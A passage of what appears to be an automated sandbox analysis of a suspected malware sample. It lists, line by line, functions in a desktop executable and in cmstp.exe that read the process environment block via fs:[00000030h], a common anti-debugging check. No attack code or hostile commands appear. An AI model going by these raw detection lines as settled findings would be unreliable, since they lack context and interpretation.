          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]1_2_009EA70E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]1_2_009EA70E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]1_2_00A8070D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]1_2_00A8070D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EE730 mov eax, dword ptr fs:[00000030h]1_2_009EE730
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]1_2_00A4FF10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]1_2_00A4FF10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]1_2_009B4F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]1_2_009B4F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88F6A mov eax, dword ptr fs:[00000030h]1_2_00A88F6A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CEF40 mov eax, dword ptr fs:[00000030h]1_2_009CEF40
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CFF60 mov eax, dword ptr fs:[00000030h]1_2_009CFF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04702073 mov eax, dword ptr fs:[00000030h]11_2_04702073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711074 mov eax, dword ptr fs:[00000030h]11_2_04711074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466746D mov eax, dword ptr fs:[00000030h]11_2_0466746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A44B mov eax, dword ptr fs:[00000030h]11_2_0467A44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]11_2_04660050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]11_2_04660050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]11_2_046DC450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]11_2_046DC450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]11_2_0467002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]11_2_0467002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]11_2_0467002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]11_2_0467002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]11_2_0467002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467BC2C mov eax, dword ptr fs:[00000030h]11_2_0467BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]11_2_0465B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]11_2_0465B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]11_2_0465B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]11_2_0465B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]11_2_04714015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]11_2_04714015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]11_2_046C6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]11_2_046C6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]11_2_046C6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]11_2_046C6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]11_2_04701C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]11_2_046C7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]11_2_046C7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]11_2_046C7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]11_2_0471740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]11_2_0471740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]11_2_0471740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046458EC mov eax, dword ptr fs:[00000030h]11_2_046458EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047014FB mov eax, dword ptr fs:[00000030h]11_2_047014FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]11_2_046C6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]11_2_046C6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]11_2_046C6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718CD6 mov eax, dword ptr fs:[00000030h]11_2_04718CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov ecx, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]11_2_046DB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046890AF mov eax, dword ptr fs:[00000030h]11_2_046890AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov ecx, dword ptr fs:[00000030h]11_2_0467F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]11_2_0467F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]11_2_0467F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649080 mov eax, dword ptr fs:[00000030h]11_2_04649080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]11_2_046C3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]11_2_046C3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465849B mov eax, dword ptr fs:[00000030h]11_2_0465849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C962 mov eax, dword ptr fs:[00000030h]11_2_0464C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]11_2_0466C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]11_2_0466C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]11_2_0464B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]11_2_0464B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]11_2_0466B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]11_2_0466B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04683D43 mov eax, dword ptr fs:[00000030h]11_2_04683D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3540 mov eax, dword ptr fs:[00000030h]11_2_046C3540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04667D50 mov eax, dword ptr fs:[00000030h]11_2_04667D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718D34 mov eax, dword ptr fs:[00000030h]11_2_04718D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov ecx, dword ptr fs:[00000030h]11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470E539 mov eax, dword ptr fs:[00000030h]11_2_0470E539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]11_2_04653D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AD30 mov eax, dword ptr fs:[00000030h]11_2_0464AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046CA537 mov eax, dword ptr fs:[00000030h]11_2_046CA537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]11_2_04674D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]11_2_04674D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]11_2_04674D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]11_2_0467513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]11_2_0467513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]11_2_04649100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]11_2_04649100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]11_2_04649100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]11_2_0464B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]11_2_0464B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]11_2_0464B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D41E8 mov eax, dword ptr fs:[00000030h]11_2_046D41E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]11_2_0465D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]11_2_0465D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]11_2_0470FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]11_2_0470FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]11_2_0470FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]11_2_0470FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046F8DF1 mov eax, dword ptr fs:[00000030h]11_2_046F8DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov ecx, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]11_2_046C6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046735A1 mov eax, dword ptr fs:[00000030h]11_2_046735A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]11_2_046761A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]11_2_046761A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C69A6 mov eax, dword ptr fs:[00000030h]11_2_046C69A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]11_2_04671DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]11_2_04671DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]11_2_04671DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]11_2_046C51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]11_2_046C51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]11_2_046C51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]11_2_046C51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]11_2_047105AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]11_2_047105AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A185 mov eax, dword ptr fs:[00000030h]11_2_0467A185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C182 mov eax, dword ptr fs:[00000030h]11_2_0466C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]11_2_04642D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]11_2_04642D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]11_2_04642D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]11_2_04642D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]11_2_04642D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672990 mov eax, dword ptr fs:[00000030h]11_2_04672990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]11_2_0467FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]11_2_0467FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465766D mov eax, dword ptr fs:[00000030h]11_2_0465766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]11_2_046FB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]11_2_046FB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468927A mov eax, dword ptr fs:[00000030h]11_2_0468927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718A62 mov eax, dword ptr fs:[00000030h]11_2_04718A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]11_2_0466AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]11_2_04649240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]11_2_04657E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470EA55 mov eax, dword ptr fs:[00000030h]11_2_0470EA55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]11_2_0470AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]11_2_0470AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D4257 mov eax, dword ptr fs:[00000030h]11_2_046D4257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464E620 mov eax, dword ptr fs:[00000030h]11_2_0464E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]11_2_04684A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]11_2_04684A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFE3F mov eax, dword ptr fs:[00000030h]11_2_046FFE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]11_2_0464C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04678E00 mov eax, dword ptr fs:[00000030h]11_2_04678E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04658A0A mov eax, dword ptr fs:[00000030h]11_2_04658A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]11_2_0464AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]11_2_0464AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov ecx, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]11_2_04645210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701608 mov eax, dword ptr fs:[00000030h]11_2_04701608
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04663A1C mov eax, dword ptr fs:[00000030h]11_2_04663A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]11_2_0467A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]11_2_0467A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672AE4 mov eax, dword ptr fs:[00000030h]11_2_04672AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046716E0 mov ecx, dword ptr fs:[00000030h]11_2_046716E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046576E2 mov eax, dword ptr fs:[00000030h]11_2_046576E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718ED6 mov eax, dword ptr fs:[00000030h]11_2_04718ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046736CC mov eax, dword ptr fs:[00000030h]11_2_046736CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672ACB mov eax, dword ptr fs:[00000030h]11_2_04672ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFEC0 mov eax, dword ptr fs:[00000030h]11_2_046FFEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04688EC7 mov eax, dword ptr fs:[00000030h]11_2_04688EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
